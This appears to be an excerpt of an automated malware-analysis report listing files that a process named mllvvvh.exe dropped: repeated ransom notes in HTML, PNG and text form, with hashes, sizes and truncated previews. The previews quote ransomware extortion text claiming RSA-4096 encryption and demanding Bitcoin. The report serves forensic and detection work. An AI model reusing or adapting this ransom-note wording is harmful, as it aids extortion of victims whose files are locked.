                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\Prov\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\Prov\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\Prov\RunTime\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\Prov\RunTime\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\Prov\RunTime\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\Prov\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\Prov\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\Prov\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\Prov\RunTime\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\Prov\RunTime\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\Prov\RunTime\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
